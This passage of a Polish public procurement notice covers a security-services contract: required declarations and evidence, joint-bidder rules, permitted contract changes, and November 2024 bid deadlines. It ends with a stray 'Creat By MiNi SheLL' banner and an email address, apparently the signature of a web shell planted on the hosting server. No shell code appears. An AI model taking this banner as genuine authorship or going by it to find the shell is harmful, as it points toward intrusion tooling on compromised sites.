sporządzonego zgodnie z treścią Załącznika nr 21 o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a)	art. 108 ust. 1 pkt 3) ustawy Pzp,<br/>b)	art. 108 ust. 1 pkt 4) ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c)	art. 108 ust. 1 pkt 5) ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d)	art. 108 ust. 1 pkt 6) ustawy Pzp,<br/>e)	art. 109 ust. 1 pkt 1) ustawy Pzp odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (tj. Dz. U. z 2023 r. poz. 70 ze zm.),<br/>f)	art. 109 ust. 1 pkt 2) lit. a) ustawy Pzp,<br/>g)	art. 109 ust. 1 pkt 2) lit. b) ustawy Pzp,<br/>h)	art. 109 ust. 1 pkt 2) lit. c) ustawy Pzp,<br/>i)	art. 109 ust. 1 pkt 3) ustawy Pzp, dotyczący ukarania za wykroczenie za które wymierzono karę ograniczenia wolności lub karę grzywny,<br/>j)	art. 109 ust. 1 pkt 4)-10) ustawy Pzp,<br/>k)	art. 7 ust. 1 pkt 1), 2), 3) ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r., poz. 507);<br/>oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tj. Dz. U. z 2024 r., poz. 1616) z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi Załącznik nr 23 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wymaga:<br/>wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy Wzór oświadczenia stanowi Załącznik nr 19 do SWZ;<br/>oświadczenia dot. kwalifikacji zawodowych Wykonawcy/ Podwykonawcy zgodnego z treścią Załącznika nr 18 do SWZ;<br/>kopię polisy ubezpieczeniowej od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 1.000.000,00 PLN (słownie: Jeden milion złotych);<br/>kopię aktualnej koncesji na wykonywanie usług ochrony osób i mienia wydaną przez Ministra Spraw Wewnętrznych i Administracji, o której mowa w ustawie z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tj. Dz. U. z 2021 r., poz. 1995).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca zobowiązany jest złożyć:<br/>Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy/ Wykonawców występujących wspólnie w postępowaniu o udzielenie zamówienia publicznego złożone w postaci elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/-y upoważnioną/-e której/-ych umocowanie do reprezentowania, co wynika z dokumentów rejestrowych – w przypadku, gdy oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem rejestrowym. Poświadczenia zgodności elektronicznej kopii pełnomocnictwa z dokumentem w postaci papierowej może dokonać mocodawca lub notariusz. (Uwaga: w przypadku spółki cywilnej dokumentami zastępującymi pełnomocnictwo mogą być umowa spółki lub uchwała wspólników, wskazująca jednego ze wspólników jako umocowanego do reprezentacji spółki (wszystkich wspólników)).<br/>Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba w imieniu Wykonawcy jest umocowana do jego reprezentowania. (Wykonawca nie jest zobowiązany do złożenia dokumentów w przypadku, gdy Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów w pkt 12 Formularza ofertowego – Załącznika nr 2 do SWZ).<br/>Zobowiązanie podmiotów udostępniających Wykonawcy do dyspozycji niezbędne zasoby na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy na potwierdzenie, że Wykonawca realizując niniejsze zamówienie będzie dysponował niezbędnymi zasobami, w przypadku gdy Wykonawca będzie polegać na zasobach innych podmiotów (wzór oświadczenia zawarty jest w treści Załącznika nr 22 do SWZ). Zobowiązanie należy złożyć pod rygorem nieważności w postaci elektronicznej, podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę upoważnioną do reprezentowania wskazaną w dokumencie rejestrowym. <br/>Zapisy pkt 2.1. i 2.2. oraz Rozdziału IV.4 stosuje się odpowiednio.<br/>Oświadczenia (aktualne na dzień składania ofert):<br/>potwierdzające brak podstaw wykluczenia, zgodnie z treścią Załącznika nr 6 do SWZ,<br/>potwierdzające spełnianie warunków udziału w postępowaniu, zgodnie z treścią Załącznika nr 20 do SWZ,<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie wskazania części przedmiotowego zamówienia, które wykonają poszczególni Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (członkowie konsorcjum). Wzór oświadczenia stanowi Załącznik nr 5 do SWZ, o którym mowa w Rozdziale III pkt. 1.2.4.1 ppkt 4) „Uwagi”.<br/>Oświadczenia, o których mowa w punktach 2.4.1 - 2.4.2 stanowią dowody potwierdzające brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujące wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>Oświadczenia potwierdzające zapoznanie Wykonawcy/ Podwykonawcy z klauzulą informacyjną w zakresie przetwarzania danych osobowych zgodne z treścią Załącznika nr 24 do SWZ.<br/>Dokumenty składane przez Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej - zgodnie z informacjami zawartymi w treści Rozdziału IV.3 SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie,<br/>każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi udokumentować, że nie podlega wykluczeniu z postępowania na podstawie przesłanek określonych w Rozdz. III.1 SWZ.<br/>zgodnie z art. 58 ust. 2 ustawy Pzp muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem.<br/>przed podpisaniem umowy przedłożą pełnomocnictwo do zawarcia umowy w sprawie zamówienia publicznego, jeżeli pełnomocnictwo takie nie zostało dołączone do oferty.<br/>w odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>ustanowiony w Rozdziale III.2 pkt 1.2.2 warunek udziału w postępowaniu dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej zgodnie z art. 112 ust. 2 pkt 2) ustawy Pzp będzie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Strony przewidują możliwość dokonania zmian niniejszej umowy zgodnie z postanowieniami art. 455 ustawy Pzp m.in. spowodowanych:<br/>1)	okolicznościami, których Zamawiający działając z należytą starannością nie mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy,<br/>2)	zmianą powszechnie obowiązujących przepisów prawa lub wynikających z prawomocnych orzeczeń lub ostatecznych aktów administracyjnych właściwych organów - w takim zakresie, w jakim będzie to niezbędne w celu dostosowania postanowień umowy do zaistniałego stanu prawnego lub faktycznego (z wyłączeniem warunków w umowie dotyczących wynagrodzenia Wykonawcy za wyjątkiem zmiany obowiązującej stawki podatku VAT),<br/>3)	zmianą stanu prawnego lub faktycznego Zamawiającego powodującą, że wykonanie przedmiotu umowy lub jego części w obecnym zakresie staje się bezprzedmiotowe lub wręcz niemożliwe do realizacji,<br/>4)	zmianą w zakresie sposobu wykonywania zadań lub zasad funkcjonowania (organizacyjnych) Zamawiającego powodującą, że wykonanie przedmiotu umowy lub jego części, w obecnym zakresie staje się bezprzedmiotowe lub wręcz niemożliwe do realizacji, <br/>5)	gdy konieczność ich wprowadzenia będzie następstwem zmian wytycznych lub zaleceń instytucji, która przyznała środki na finansowanie zamówienia,<br/>6)	wystąpieniem siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami, (siła wyższa rozumiana jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części). W razie wystąpienia siły wyższej Strony umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły wyższej,<br/>7)	wymogiem ochrony interesu Zamawiającego.<br/>Działając zgodnie z postanowieniami art. 455 ust. 2 ustawy Pzp, Zamawiający jest uprawniony do dokonywania jednostronnych zmian umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia:<br/>1)	których łączna wartość jest niższa niż 10% wartości zamówienia podstawowego, o którym mowa w § 2 ust. 3 pkt 1) a zmiany te nie powodują zmiany ogólnego charakteru niniejszej umowy,<br/>2)	zmiany wynagrodzenia określonego w § 6 ust. 2 pkt 2) w wyniku:<br/>a)	dokonania zmian zgodnie z pkt 1),<br/>b)	wyłączenia obiektu wskazanego § 3 ust. 12 umowy z wszelkich świadczeń objętych Usługą (tj. dokonania zapłaty wynagrodzenia Wykonawcy za faktycznie zrealizowane świadczenia w obiektach Zamawiającego niepodlegających wyłączeniu ze świadczeń według ustalonej w § 6 ust. 3 pkt 1)-3) wysokości opłat),<br/>3)	częściowej lub całkowitej rezygnacji z korzystania z zamówienia opcjonalnego, o którym mowa w § 2 ust. 3 pkt 2) umowy.<br/>Strony Umowy działając zgodnie z art. 439 ustawy Pzp są uprawnione do dokonania zmiany umowy polegającej na zmianie wynagrodzenia należnego Wykonawcy w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją przedmiotowego zamówienia, zgodnie z zasadami określonymi przez Zamawiającego w § 12 ust. 5-9 Załącznika nr 8 do SWZ (PPU). <br/>Szczegółowe warunki zmian zostały opisane przez Zamawiającego w projektowanych postanowieniach umowy wraz z<br/>załącznikami, stanowiących Załącznik nr 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-15 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/arimr</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-15 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com